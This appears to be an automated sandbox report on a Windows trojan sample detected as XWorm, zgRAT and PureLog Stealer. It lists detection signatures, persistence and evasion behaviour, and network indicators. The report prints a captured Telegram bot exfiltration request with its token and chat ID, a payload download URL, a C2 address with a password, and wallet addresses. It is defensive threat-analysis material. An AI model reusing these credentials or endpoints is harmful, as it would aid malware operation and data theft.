Windows Analysis Report
9NBx4Vmiuj.exe

Overview

General Information

Sample name:	9NBx4Vmiuj.exe renamed because original name is a hash value
Original sample name:	1d562eaa3e33451a40f60c976c6f4bc0.exe
Analysis ID:	1416004
MD5:	1d562eaa3e33451a40f60c976c6f4bc0
SHA1:	de0f3e027e12162388ec953936857f06b71487ca
SHA256:	dde68755fa515158e01e3e8f2b90772dc86e25b7e2684fc5066a5e33ee22b614
Tags:	64exetrojan
Infos:

Detection

PureLog Stealer, XWorm, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Telegram RAT

Yara detected XWorm

Yara detected zgRAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Connects to many ports of the same IP (likely port scanning)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Protects its processes via BreakOnTermination flag

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Yara detected PersistenceViaHiddenTask

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 9NBx4Vmiuj.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://185.196.10.233/dggfsff.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\ProgramData\btjxg.exe	Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: btjxg.exe.1784.4.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\btjxg.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: 9NBx4Vmiuj.exe

ReversingLabs: Detection: 55%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\btjxg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 9NBx4Vmiuj.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 157.254.223.19
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 8081
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: private@123
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: <Xwormmm>
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: USB.exe
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: bc1qvnmel0wr7n7xam2jq9cd6v9kq9ll0fc3ps5j2p
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 0x459d192EF8f2288915a6aA1A6F2f9685A42dd7e4
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: TRDyFoJLpPN2oCCX4ANzpcEiJJiZSR9uZQ
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack	String decryptor: 1267602057

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49794 version: TLS 1.2

Source: 9NBx4Vmiuj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Pjraflkwkhj.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 00000002.00000002.2158779274.000002184E741000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3409147293.000001E3C9781000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2610110087.0000020937261000.00000004.00000800.00020000.00000000.sdmp

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 157.254.223.19:8081 -> 192.168.2.5:49797

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.196.10.233 ports 39001,0,1,3,80,9

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\btjxg.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.5:49726 -> 185.196.10.233:39001
Source: global traffic	TCP traffic: 192.168.2.5:49797 -> 157.254.223.19:8081

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Mar 2024 17:23:16 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 25 Mar 2024 19:48:20 GMTETag: "25200-6148174a2032a"Accept-Ranges: bytesContent-Length: 152064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 66 be 01 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 96 00 00 00 ba 01 00 00 00 00 00 1e b4 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 b3 00 00 57 00 00 00 00 c0 00 00 ac b7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 94 00 00 00 20 00 00 00 96 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac b7 01 00 00 c0 00 00 00 b8 01 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 02 00 00 02 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 00 00 00 00 00 00 48 00 00 00 02 00 05 00 90 58 00 00 34 5b 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=1267602057&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A9FCA14390BF6B97E9DB7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dggfsff.exe HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TECHNICOLORUS TECHNICOLORUS
Source: Joe Sandbox View	ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=1267602057&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A9FCA14390BF6B97E9DB7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dggfsff.exe HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: gjhfhgdg.insane.wang

Source: RegSvcs.exe, 00000003.00000002.3376937115.000001E3B95A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.196.10.233/dggfsff.exe
Source: btjxg.exe, 00000004.00000002.3374102569.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 0000000D.00000002.2821942479.000002801EE5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000A.00000002.2555794283.000001ECF40A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000005.00000002.2367987837.000002AEC8A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
